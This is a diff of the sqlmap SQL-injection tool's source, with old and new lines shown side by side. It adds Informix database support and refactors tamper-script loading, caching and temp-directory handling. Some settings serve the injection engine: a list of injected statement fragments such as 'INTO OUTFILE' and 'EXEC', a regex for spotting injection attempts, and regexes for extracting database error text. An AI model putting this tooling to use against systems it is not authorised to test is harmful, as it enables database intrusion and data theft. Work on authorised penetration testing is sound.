3: "FLOAT",
4: "SMALLFLOAT",
5: "DECIMAL",
6: "SERIAL",
7: "DATE",
8: "MONEY",
9: "NULL",
10: "DATETIME",
11: "BYTE",
12: "TEXT",
13: "VARCHAR",
14: "INTERVAL",
15: "NCHAR",
16: "NVARCHAR",
17: "INT8",
18: "SERIAL8",
19: "SET",
20: "MULTISET",
21: "LIST",
22: "ROW (unnamed)",
23: "COLLECTION",
40: "Variable-length opaque type",
41: "Fixed-length opaque type",
43: "LVARCHAR",
45: "BOOLEAN",
52: "BIGINT",
53: "BIGSERIAL",
2061: "IDSSECURITYLABEL",
4118: "ROW (named)",
}
SYBASE_TYPES = { SYBASE_TYPES = {
14: "floatn", 14: "floatn",
8: "float", 8: "float",
@@ -123,6 +159,17 @@ FIREBIRD_PRIVS = {
"B": "SUBSCRIBE", "B": "SUBSCRIBE",
} }
# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm
# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm
INFORMIX_PRIVS = {
"D": "DBA (all privileges)",
"R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)",
"C": "CONNECT (work with existing tables)",
"G": "ROLE",
"U": "DEFAULT (implicit connection)",
}
DB2_PRIVS = { DB2_PRIVS = {
1: "CONTROLAUTH", 1: "CONTROLAUTH",
2: "ALTERAUTH", 2: "ALTERAUTH",
@@ -146,8 +193,9 @@ DBMS_DICT = {
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"), DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
} }
FROM_DUMMY_TABLE = { FROM_DUMMY_TABLE = {
@@ -156,7 +204,8 @@ FROM_DUMMY_TABLE = {
DBMS.FIREBIRD: " FROM RDB$DATABASE", DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS", DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS" DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS",
DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL"
} }
SQL_STATEMENTS = { SQL_STATEMENTS = {

View File

@@ -34,6 +34,7 @@ class DBMS:
SQLITE = "SQLite" SQLITE = "SQLite"
SYBASE = "Sybase" SYBASE = "Sybase"
HSQLDB = "HSQLDB" HSQLDB = "HSQLDB"
INFORMIX = "Informix"
class DBMS_DIRECTORY_NAME: class DBMS_DIRECTORY_NAME:
ACCESS = "access" ACCESS = "access"
@@ -47,6 +48,7 @@ class DBMS_DIRECTORY_NAME:
SQLITE = "sqlite" SQLITE = "sqlite"
SYBASE = "sybase" SYBASE = "sybase"
HSQLDB = "hsqldb" HSQLDB = "hsqldb"
INFORMIX = "informix"
class CUSTOM_LOGGING: class CUSTOM_LOGGING:
PAYLOAD = 9 PAYLOAD = 9

View File

@@ -883,32 +883,32 @@ def _setTamperingFunctions():
resolve_priorities = False resolve_priorities = False
priorities = [] priorities = []
for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
found = False found = False
tfile = tfile.strip() script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
if not tfile: if not script:
continue continue
elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)):
tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) script = os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)
elif not os.path.exists(tfile): elif not os.path.exists(script):
errMsg = "tamper script '%s' does not exist" % tfile errMsg = "tamper script '%s' does not exist" % script
raise SqlmapFilePathException(errMsg) raise SqlmapFilePathException(errMsg)
elif not tfile.endswith('.py'): elif not script.endswith(".py"):
errMsg = "tamper script '%s' should have an extension '.py'" % tfile errMsg = "tamper script '%s' should have an extension '.py'" % script
raise SqlmapSyntaxException(errMsg) raise SqlmapSyntaxException(errMsg)
dirname, filename = os.path.split(tfile) dirname, filename = os.path.split(script)
dirname = os.path.abspath(dirname) dirname = os.path.abspath(dirname)
infoMsg = "loading tamper script '%s'" % filename[:-3] infoMsg = "loading tamper script '%s'" % filename[:-3]
logger.info(infoMsg) logger.info(infoMsg)
if not os.path.exists(os.path.join(dirname, '__init__.py')): if not os.path.exists(os.path.join(dirname, "__init__.py")):
errMsg = "make sure that there is an empty file '__init__.py' " errMsg = "make sure that there is an empty file '__init__.py' "
errMsg += "inside of tamper scripts directory '%s'" % dirname errMsg += "inside of tamper scripts directory '%s'" % dirname
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
@@ -917,11 +917,11 @@ def _setTamperingFunctions():
sys.path.insert(0, dirname) sys.path.insert(0, dirname)
try: try:
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) module = __import__(filename[:-3])
except (ImportError, SyntaxError), ex: except (ImportError, SyntaxError), ex:
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction): for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
@@ -953,7 +953,7 @@ def _setTamperingFunctions():
if not found: if not found:
errMsg = "missing function 'tamper(payload, **kwargs)' " errMsg = "missing function 'tamper(payload, **kwargs)' "
errMsg += "in tamper script '%s'" % tfile errMsg += "in tamper script '%s'" % script
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
if kb.tamperFunctions and len(kb.tamperFunctions) > 3: if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
@@ -1014,12 +1014,12 @@ def _setDNSCache():
""" """
def _getaddrinfo(*args, **kwargs): def _getaddrinfo(*args, **kwargs):
if args in kb.cache: if args in kb.cache.addrinfo:
return kb.cache[args] return kb.cache.addrinfo[args]
else: else:
kb.cache[args] = socket._getaddrinfo(*args, **kwargs) kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache[args] return kb.cache.addrinfo[args]
if not hasattr(socket, "_getaddrinfo"): if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo socket._getaddrinfo = socket.getaddrinfo
@@ -1396,16 +1396,12 @@ def _setHTTPExtraHeaders():
raise SqlmapSyntaxException(errMsg) raise SqlmapSyntaxException(errMsg)
elif not conf.requestFile and len(conf.httpHeaders or []) < 2: elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) if conf.charset:
if not conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
else:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
# Invalidating any caching mechanism in between # Invalidating any caching mechanism in between
# Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html # Reference: http://stackoverflow.com/a/1383359
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store")) conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache"))
def _defaultHTTPUserAgent(): def _defaultHTTPUserAgent():
""" """
@@ -1415,13 +1411,6 @@ def _defaultHTTPUserAgent():
return "%s (%s)" % (VERSION_STRING, SITE) return "%s (%s)" % (VERSION_STRING, SITE)
# Firefox 3 running on Ubuntu 9.04 updated at April 2009
#return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
# Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english
# updated at March 2009
#return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
def _setHTTPUserAgent(): def _setHTTPUserAgent():
""" """
Set the HTTP User-Agent header. Set the HTTP User-Agent header.
@@ -1566,6 +1555,7 @@ def _createTemporaryDirectory():
os.makedirs(conf.tmpDir) os.makedirs(conf.tmpDir)
_ = os.path.join(conf.tmpDir, randomStr()) _ = os.path.join(conf.tmpDir, randomStr())
open(_, "w+b").close() open(_, "w+b").close()
os.remove(_) os.remove(_)
@@ -1581,21 +1571,29 @@ def _createTemporaryDirectory():
try: try:
if not os.path.isdir(tempfile.gettempdir()): if not os.path.isdir(tempfile.gettempdir()):
os.makedirs(tempfile.gettempdir()) os.makedirs(tempfile.gettempdir())
except IOError, ex: except (OSError, IOError, WindowsError), ex:
errMsg = "there has been a problem while accessing " warnMsg = "there has been a problem while accessing "
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
errMsg += "make sure that there is enough disk space left. If problem persists, " warnMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location " warnMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user" warnMsg += "writeable by the current user"
raise SqlmapSystemException, errMsg logger.warn(warnMsg)
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
try:
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
except (OSError, IOError, WindowsError):
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
kb.tempDir = tempfile.tempdir kb.tempDir = tempfile.tempdir
if not os.path.isdir(tempfile.tempdir): if not os.path.isdir(tempfile.tempdir):
try:
os.makedirs(tempfile.tempdir) os.makedirs(tempfile.tempdir)
except (OSError, IOError, WindowsError), ex:
errMsg = "there has been a problem while setting "
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
raise SqlmapSystemException, errMsg
def _cleanupOptions(): def _cleanupOptions():
""" """
@@ -1841,7 +1839,11 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.bruteMode = False kb.bruteMode = False
kb.cache = AttribDict() kb.cache = AttribDict()
kb.cache.addrinfo = {}
kb.cache.content = {} kb.cache.content = {}
kb.cache.encoding = {}
kb.cache.intBoundaries = None
kb.cache.parsedDbms = {}
kb.cache.regex = {} kb.cache.regex = {}
kb.cache.stdev = {} kb.cache.stdev = {}
@@ -1975,7 +1977,6 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.threadContinue = True kb.threadContinue = True
kb.threadException = False kb.threadException = False
kb.tableExistsChoice = None kb.tableExistsChoice = None
kb.timeValidCharsRun = 0
kb.uChar = NULL kb.uChar = NULL
kb.unionDuplicates = False kb.unionDuplicates = False
kb.xpCmdshellAvailable = False kb.xpCmdshellAvailable = False

View File

@@ -235,6 +235,7 @@ optDict = {
"profile": "boolean", "profile": "boolean",
"forceDns": "boolean", "forceDns": "boolean",
"ignore401": "boolean", "ignore401": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean", "smokeTest": "boolean",
"liveTest": "boolean", "liveTest": "boolean",
"stopFail": "boolean", "stopFail": "boolean",

View File

@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
""" """
import os import os
import random
import re import re
import subprocess import subprocess
import string import string
@@ -19,7 +20,7 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.9.1" VERSION = "1.0.10.0"
REVISION = getRevisionNumber() REVISION = getRevisionNumber()
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
@@ -31,11 +32,13 @@ GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
# colorful banner # colorful banner
BANNER = """\033[01;33m _ BANNER = """\033[01;33m\
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m ___
|_ -| . | | | .'| . | __H__
|___|_ |_|_|_|_|__,| _| ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|_| |_| \033[0m\033[4;37m%s\033[0m\n |_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| \033[0m\033[4;37m%s\033[0m\n
""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE) """ % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)
# Minimum distance of ratio from kb.matchRatio to result in True # Minimum distance of ratio from kb.matchRatio to result in True
@@ -65,13 +68,14 @@ BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]" RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]" RANDOM_STRING_MARKER = "[RANDSTR]"
SLEEP_TIME_MARKER = "[SLEEPTIME]"
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
CHAR_INFERENCE_MARK = "%c" CHAR_INFERENCE_MARK = "%c"
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess) # Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b" SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"
# Regular expression used for recognition of textual content-type # Regular expression used for recognition of textual content-type
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
@@ -85,6 +89,9 @@ MAX_CONNECTIONS_REGEX = r"max.+connections"
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) # Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10 PRECONNECT_CANDIDATE_TIMEOUT = 10
# Maximum sleep time in "Murphy" (testing) mode
MAX_MURPHY_SLEEP_TIME = 3
# Regular expression used for extracting results from Google search # Regular expression used for extracting results from Google search
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
@@ -129,7 +136,7 @@ UNION_STDEV_COEFF = 7
TIME_DELAY_CANDIDATES = 3 TIME_DELAY_CANDIDATES = 3
# Default value for HTTP Accept header # Default value for HTTP Accept header
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" HTTP_ACCEPT_HEADER_VALUE = "*/*"
# Default value for HTTP Accept-Encoding header # Default value for HTTP Accept-Encoding header
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
@@ -217,6 +224,7 @@ SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my") MYSQL_ALIASES = ("mysql", "my")
@@ -229,10 +237,11 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server") SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES
SUPPORTED_OS = ("linux", "windows") SUPPORTED_OS = ("linux", "windows")
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
@@ -298,9 +307,10 @@ FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P
ERROR_PARSING_REGEXES = ( ERROR_PARSING_REGEXES = (
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>", r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$", r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
r"<li>Error Type:<br>(?P<result>.+?)</li>", r"<li>Error Type:<br>(?P<result>.+?)</li>",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)", r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$" r"\[[^\n\]]+(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)"
) )
# Regular expression used for parsing charset info from meta html headers # Regular expression used for parsing charset info from meta html headers
@@ -364,7 +374,7 @@ MIN_ERROR_CHUNK_LENGTH = 8
MAX_ERROR_CHUNK_LENGTH = 1024 MAX_ERROR_CHUNK_LENGTH = 1024
# Do not escape the injected statement if it contains any of the following SQL keywords # Do not escape the injected statement if it contains any of the following SQL keywords
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK) EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "DBINFO(", "'%s'" % CHAR_INFERENCE_MARK)
# Mark used for replacement of reflected values # Mark used for replacement of reflected values
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__" REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
@@ -459,7 +469,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler # Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx') CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
# Patterns often seen in HTTP headers containing custom injection marking character # Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)" PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -507,20 +517,20 @@ PARSE_HEADERS_LIMIT = 3
# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections # Step used in ORDER BY technique used for finding the right number of columns in UNION query injections
ORDER_BY_STEP = 10 ORDER_BY_STEP = 10
# Maximum number of times for revalidation of a character in time-based injections # Maximum number of times for revalidation of a character in inference (as required)
